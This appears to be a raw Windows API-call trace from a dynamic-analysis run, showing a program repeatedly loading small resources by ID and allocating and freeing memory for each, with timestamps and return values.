GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.274] FindResourceW (hModule=0x400000, lpName=0x442, lpType=0x7) returned 0x491750 [0133.274] SizeofResource (hModule=0x400000, hResInfo=0x491750) returned 0xdc [0133.274] LoadResource (hModule=0x400000, hResInfo=0x491750) returned 0x49e4cc [0133.274] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.274] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.274] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.274] FindResourceW (hModule=0x400000, lpName=0x443, lpType=0x7) returned 0x491760 [0133.274] SizeofResource (hModule=0x400000, hResInfo=0x491760) returned 0xdc [0133.274] LoadResource (hModule=0x400000, hResInfo=0x491760) returned 0x49e5a8 [0133.274] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.275] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.275] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.275] FindResourceW (hModule=0x400000, lpName=0x444, lpType=0x7) returned 0x491770 [0133.275] SizeofResource (hModule=0x400000, hResInfo=0x491770) returned 0xdc [0133.275] LoadResource (hModule=0x400000, hResInfo=0x491770) returned 0x49e684 [0133.275] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.275] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.276] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.276] FindResourceW (hModule=0x400000, lpName=0x445, lpType=0x7) returned 0x491780 [0133.276] SizeofResource (hModule=0x400000, hResInfo=0x491780) returned 0xdc [0133.276] LoadResource (hModule=0x400000, hResInfo=0x491780) returned 0x49e760 [0133.276] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.276] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.276] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.276] FindResourceW (hModule=0x400000, lpName=0x446, lpType=0x7) returned 0x491790 [0133.276] SizeofResource (hModule=0x400000, hResInfo=0x491790) returned 0xdc [0133.276] LoadResource (hModule=0x400000, hResInfo=0x491790) returned 0x49e83c [0133.276] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.277] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.277] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.277] FindResourceW (hModule=0x400000, lpName=0x447, lpType=0x7) returned 0x4917a0 [0133.277] SizeofResource (hModule=0x400000, hResInfo=0x4917a0) returned 0xdc [0133.277] LoadResource (hModule=0x400000, hResInfo=0x4917a0) returned 0x49e918 [0133.277] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.277] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.278] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.278] FindResourceW (hModule=0x400000, lpName=0x448, lpType=0x7) returned 0x4917b0 [0133.278] SizeofResource (hModule=0x400000, hResInfo=0x4917b0) returned 0xdc [0133.278] LoadResource (hModule=0x400000, hResInfo=0x4917b0) returned 0x49e9f4 [0133.278] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.278] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.278] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.278] FindResourceW (hModule=0x400000, lpName=0x449, lpType=0x7) returned 0x4917c0 [0133.278] SizeofResource (hModule=0x400000, hResInfo=0x4917c0) returned 0xdc [0133.278] LoadResource (hModule=0x400000, hResInfo=0x4917c0) returned 0x49ead0 [0133.278] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.279] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.279] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.279] FindResourceW (hModule=0x400000, lpName=0x44a, lpType=0x7) returned 0x4917d0 [0133.279] SizeofResource (hModule=0x400000, hResInfo=0x4917d0) returned 0xdc [0133.279] LoadResource (hModule=0x400000, hResInfo=0x4917d0) returned 0x49ebac [0133.279] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.279] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.279] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.279] FindResourceW (hModule=0x400000, lpName=0x44b, lpType=0x7) returned 0x4917e0 [0133.279] SizeofResource (hModule=0x400000, hResInfo=0x4917e0) returned 0xdc [0133.279] LoadResource (hModule=0x400000, hResInfo=0x4917e0) returned 0x49ec88 [0133.279] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.280] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.280] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.280] FindResourceW (hModule=0x400000, lpName=0x44c, lpType=0x7) returned 0x4917f0 [0133.280] SizeofResource (hModule=0x400000, hResInfo=0x4917f0) returned 0xdc [0133.280] LoadResource (hModule=0x400000, hResInfo=0x4917f0) returned 0x49ed64 [0133.280] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.281] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.281] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.281] FindResourceW (hModule=0x400000, lpName=0x44d, lpType=0x7) returned 0x491800 [0133.281] SizeofResource (hModule=0x400000, hResInfo=0x491800) returned 0xdc [0133.281] LoadResource (hModule=0x400000, hResInfo=0x491800) returned 0x49ee40 [0133.281] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.281] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.281] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.281] FindResourceW (hModule=0x400000, lpName=0x44e, lpType=0x7) returned 0x491810 [0133.281] SizeofResource (hModule=0x400000, hResInfo=0x491810) returned 0xdc [0133.281] LoadResource (hModule=0x400000, hResInfo=0x491810) returned 0x49ef1c [0133.281] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.282] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.282] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.282] FindResourceW (hModule=0x400000, lpName=0x44f, lpType=0x7) returned 0x491820 [0133.282] SizeofResource (hModule=0x400000, hResInfo=0x491820) returned 0xdc [0133.282] LoadResource (hModule=0x400000, hResInfo=0x491820) returned 0x49eff8 [0133.282] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.282] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.283] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.283] FindResourceW (hModule=0x400000, lpName=0x450, lpType=0x7) returned 0x491830 [0133.283] SizeofResource (hModule=0x400000, hResInfo=0x491830) returned 0xdc [0133.283] LoadResource (hModule=0x400000, hResInfo=0x491830) returned 0x49f0d4 [0133.283] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.283] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.283] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.283] FindResourceW (hModule=0x400000, lpName=0x451, lpType=0x7) returned 0x491840 [0133.283] SizeofResource (hModule=0x400000, hResInfo=0x491840) returned 0xdc [0133.283] LoadResource (hModule=0x400000, hResInfo=0x491840) returned 0x49f1b0 [0133.283] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.284] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.284] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.284] FindResourceW (hModule=0x400000, lpName=0x452, lpType=0x7) returned 0x491850 [0133.284] SizeofResource (hModule=0x400000, hResInfo=0x491850) returned 0xdc [0133.284] LoadResource (hModule=0x400000, hResInfo=0x491850) returned 0x49f28c [0133.284] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.284] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.285] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.285] FindResourceW (hModule=0x400000, lpName=0x453, lpType=0x7) returned 0x491860 [0133.285] SizeofResource (hModule=0x400000, hResInfo=0x491860) returned 0xdc [0133.285] LoadResource (hModule=0x400000, hResInfo=0x491860) returned 0x49f368 [0133.285] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.285] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.285] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.285] FindResourceW (hModule=0x400000, lpName=0x454, lpType=0x7) returned 0x491870 [0133.285] SizeofResource (hModule=0x400000, hResInfo=0x491870) returned 0xdc [0133.285] LoadResource (hModule=0x400000, hResInfo=0x491870) returned 0x49f444 [0133.285] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.286] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.286] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.286] FindResourceW (hModule=0x400000, lpName=0x455, lpType=0x7) returned 0x491880 [0133.286] SizeofResource (hModule=0x400000, hResInfo=0x491880) returned 0xdc [0133.286] LoadResource (hModule=0x400000, hResInfo=0x491880) returned 0x49f520 [0133.286] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.286] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.286] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.286] FindResourceW (hModule=0x400000, lpName=0x456, lpType=0x7) returned 0x491890 [0133.286] SizeofResource (hModule=0x400000, hResInfo=0x491890) returned 0xdc [0133.286] LoadResource (hModule=0x400000, hResInfo=0x491890) returned 0x49f5fc [0133.286] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.287] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.287] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.287] FindResourceW (hModule=0x400000, lpName=0x457, lpType=0x7) returned 0x4918a0 [0133.287] SizeofResource (hModule=0x400000, hResInfo=0x4918a0) returned 0xdc [0133.287] LoadResource (hModule=0x400000, hResInfo=0x4918a0) returned 0x49f6d8 [0133.287] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.287] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.288] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.288] FindResourceW (hModule=0x400000, lpName=0x458, lpType=0x7) returned 0x4918b0 [0133.288] SizeofResource (hModule=0x400000, hResInfo=0x4918b0) returned 0xdc [0133.288] LoadResource (hModule=0x400000, hResInfo=0x4918b0) returned 0x49f7b4 [0133.288] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.288] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.288] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.288] FindResourceW (hModule=0x400000, lpName=0x459, lpType=0x7) returned 0x4918c0 [0133.288] SizeofResource (hModule=0x400000, hResInfo=0x4918c0) returned 0xdc [0133.288] LoadResource (hModule=0x400000, hResInfo=0x4918c0) returned 0x49f890 [0133.288] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.289] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.289] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.289] FindResourceW (hModule=0x400000, lpName=0x45a, lpType=0x7) returned 0x4918d0 [0133.289] SizeofResource (hModule=0x400000, hResInfo=0x4918d0) returned 0xdc [0133.289] LoadResource (hModule=0x400000, hResInfo=0x4918d0) returned 0x49f96c [0133.289] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.289] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.289] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.290] FindResourceW (hModule=0x400000, lpName=0x45b, lpType=0x7) returned 0x4918e0 [0133.290] SizeofResource (hModule=0x400000, hResInfo=0x4918e0) returned 0xdc [0133.290] LoadResource (hModule=0x400000, hResInfo=0x4918e0) returned 0x49fa48 [0133.290] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.290] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.290] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.290] FindResourceW (hModule=0x400000, lpName=0x45c, lpType=0x7) returned 0x4918f0 [0133.290] SizeofResource (hModule=0x400000, hResInfo=0x4918f0) returned 0xdc [0133.290] LoadResource (hModule=0x400000, hResInfo=0x4918f0) returned 0x49fb24 [0133.290] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.291] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.291] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.291] FindResourceW (hModule=0x400000, lpName=0x45d, lpType=0x7) returned 0x491900 [0133.291] SizeofResource (hModule=0x400000, hResInfo=0x491900) returned 0xdc [0133.291] LoadResource (hModule=0x400000, hResInfo=0x491900) returned 0x49fc00 [0133.291] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.291] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.291] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.291] FindResourceW (hModule=0x400000, lpName=0x45e, lpType=0x7) returned 0x491910 [0133.291] SizeofResource (hModule=0x400000, hResInfo=0x491910) returned 0xdc [0133.291] LoadResource (hModule=0x400000, hResInfo=0x491910) returned 0x49fcdc [0133.291] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.292] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.292] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.292] FindResourceW (hModule=0x400000, lpName=0x45f, lpType=0x7) returned 0x491920 [0133.292] SizeofResource (hModule=0x400000, hResInfo=0x491920) returned 0xdc [0133.292] LoadResource (hModule=0x400000, hResInfo=0x491920) returned 0x49fdb8 [0133.292] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.292] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.293] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.293] FindResourceW (hModule=0x400000, lpName=0x460, lpType=0x7) returned 0x491930 [0133.293] SizeofResource (hModule=0x400000, hResInfo=0x491930) returned 0xdc [0133.293] LoadResource (hModule=0x400000, hResInfo=0x491930) returned 0x49fe94 [0133.293] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.293] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.293] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.293] FindResourceW (hModule=0x400000, lpName=0x461, lpType=0x7) returned 0x491940 [0133.293] SizeofResource (hModule=0x400000, hResInfo=0x491940) returned 0xdc [0133.293] LoadResource (hModule=0x400000, hResInfo=0x491940) returned 0x49ff70 [0133.293] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.294] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.294] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.294] FindResourceW (hModule=0x400000, lpName=0x462, lpType=0x7) returned 0x491950 [0133.294] SizeofResource (hModule=0x400000, hResInfo=0x491950) returned 0xdc [0133.294] LoadResource (hModule=0x400000, hResInfo=0x491950) returned 0x4a004c [0133.294] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.294] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.295] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.295] FindResourceW (hModule=0x400000, lpName=0x463, lpType=0x7) returned 0x491960 [0133.295] SizeofResource (hModule=0x400000, hResInfo=0x491960) returned 0xdc [0133.295] LoadResource (hModule=0x400000, hResInfo=0x491960) returned 0x4a0128 [0133.295] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.295] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.295] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.295] FindResourceW (hModule=0x400000, lpName=0x464, lpType=0x7) returned 0x491970 [0133.295] SizeofResource (hModule=0x400000, hResInfo=0x491970) returned 0xdc [0133.295] LoadResource (hModule=0x400000, hResInfo=0x491970) returned 0x4a0204 [0133.295] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.296] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.296] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.296] FindResourceW (hModule=0x400000, lpName=0x465, lpType=0x7) returned 0x491980 [0133.296] SizeofResource (hModule=0x400000, hResInfo=0x491980) returned 0xdc [0133.296] LoadResource (hModule=0x400000, hResInfo=0x491980) returned 0x4a02e0 [0133.296] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.297] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.297] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.297] FindResourceW (hModule=0x400000, lpName=0x466, lpType=0x7) returned 0x491990 [0133.297] SizeofResource (hModule=0x400000, hResInfo=0x491990) returned 0xdc [0133.297] LoadResource (hModule=0x400000, hResInfo=0x491990) returned 0x4a03bc [0133.297] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.297] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.297] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.297] FindResourceW (hModule=0x400000, lpName=0x467, lpType=0x7) returned 0x4919a0 [0133.297] SizeofResource (hModule=0x400000, hResInfo=0x4919a0) returned 0xdc [0133.297] LoadResource (hModule=0x400000, hResInfo=0x4919a0) returned 0x4a0498 [0133.297] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.298] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.298] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.298] FindResourceW (hModule=0x400000, lpName=0x468, lpType=0x7) returned 0x4919b0 [0133.298] SizeofResource (hModule=0x400000, hResInfo=0x4919b0) returned 0xdc [0133.298] LoadResource (hModule=0x400000, hResInfo=0x4919b0) returned 0x4a0574 [0133.298] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.299] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.299] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.299] FindResourceW (hModule=0x400000, lpName=0x469, lpType=0x7) returned 0x4919c0 [0133.299] SizeofResource (hModule=0x400000, hResInfo=0x4919c0) returned 0xdc [0133.299] LoadResource (hModule=0x400000, hResInfo=0x4919c0) returned 0x4a0650 [0133.299] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.299] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.299] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.299] FindResourceW (hModule=0x400000, lpName=0x46a, lpType=0x7) returned 0x4919d0 [0133.299] SizeofResource (hModule=0x400000, hResInfo=0x4919d0) returned 0xdc [0133.299] LoadResource (hModule=0x400000, hResInfo=0x4919d0) returned 0x4a072c [0133.299] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.300] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.300] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.300] FindResourceW (hModule=0x400000, lpName=0x46b, lpType=0x7) returned 0x4919e0 [0133.300] SizeofResource (hModule=0x400000, hResInfo=0x4919e0) returned 0xdc [0133.300] LoadResource (hModule=0x400000, hResInfo=0x4919e0) returned 0x4a0808 [0133.300] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.301] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.301] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.301] FindResourceW (hModule=0x400000, lpName=0x46c, lpType=0x7) returned 0x4919f0 [0133.301] SizeofResource (hModule=0x400000, hResInfo=0x4919f0) returned 0xdc [0133.301] LoadResource (hModule=0x400000, hResInfo=0x4919f0) returned 0x4a08e4 [0133.301] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.301] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.301] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.301] FindResourceW (hModule=0x400000, lpName=0x46d, lpType=0x7) returned 0x491a00 [0133.301] SizeofResource (hModule=0x400000, hResInfo=0x491a00) returned 0xdc [0133.301] LoadResource (hModule=0x400000, hResInfo=0x491a00) returned 0x4a09c0 [0133.301] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.302] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.302] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.302] FindResourceW (hModule=0x400000, lpName=0x46e, lpType=0x7) returned 0x491a10 [0133.302] SizeofResource (hModule=0x400000, hResInfo=0x491a10) returned 0xdc [0133.302] LoadResource (hModule=0x400000, hResInfo=0x491a10) returned 0x4a0a9c [0133.302] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.303] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.303] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.303] FindResourceW (hModule=0x400000, lpName=0x46f, lpType=0x7) returned 0x491a20 [0133.303] SizeofResource (hModule=0x400000, hResInfo=0x491a20) returned 0xdc [0133.303] LoadResource (hModule=0x400000, hResInfo=0x491a20) returned 0x4a0b78 [0133.303] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.303] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.303] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.303] FindResourceW (hModule=0x400000, lpName=0x470, lpType=0x7) returned 0x491a30 [0133.303] SizeofResource (hModule=0x400000, hResInfo=0x491a30) returned 0xdc [0133.303] LoadResource (hModule=0x400000, hResInfo=0x491a30) returned 0x4a0c54 [0133.303] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.304] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.304] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.304] FindResourceW (hModule=0x400000, lpName=0x471, lpType=0x7) returned 0x491a40 [0133.304] SizeofResource (hModule=0x400000, hResInfo=0x491a40) returned 0xdc [0133.304] LoadResource (hModule=0x400000, hResInfo=0x491a40) returned 0x4a0d30 [0133.304] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.304] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.305] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.305] FindResourceW (hModule=0x400000, lpName=0x472, lpType=0x7) returned 0x491a50 [0133.305] SizeofResource (hModule=0x400000, hResInfo=0x491a50) returned 0xdc [0133.305] LoadResource (hModule=0x400000, hResInfo=0x491a50) returned 0x4a0e0c [0133.305] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.305] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.305] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.305] FindResourceW (hModule=0x400000, lpName=0x473, lpType=0x7) returned 0x491a60 [0133.305] SizeofResource (hModule=0x400000, hResInfo=0x491a60) returned 0xdc [0133.305] LoadResource (hModule=0x400000, hResInfo=0x491a60) returned 0x4a0ee8 [0133.305] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.306] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.306] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.306] FindResourceW (hModule=0x400000, lpName=0x474, lpType=0x7) returned 0x491a70 [0133.306] SizeofResource (hModule=0x400000, hResInfo=0x491a70) returned 0xdc [0133.306] LoadResource (hModule=0x400000, hResInfo=0x491a70) returned 0x4a0fc4 [0133.306] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.306] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.307] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.307] FindResourceW (hModule=0x400000, lpName=0x475, lpType=0x7) returned 0x491a80 [0133.307] SizeofResource (hModule=0x400000, hResInfo=0x491a80) returned 0xdc [0133.307] LoadResource (hModule=0x400000, hResInfo=0x491a80) returned 0x4a10a0 [0133.307] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.307] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.307] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.307] FindResourceW (hModule=0x400000, lpName=0x476, lpType=0x7) returned 0x491a90 [0133.307] SizeofResource (hModule=0x400000, hResInfo=0x491a90) returned 0xdc [0133.307] LoadResource (hModule=0x400000, hResInfo=0x491a90) returned 0x4a117c [0133.307] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 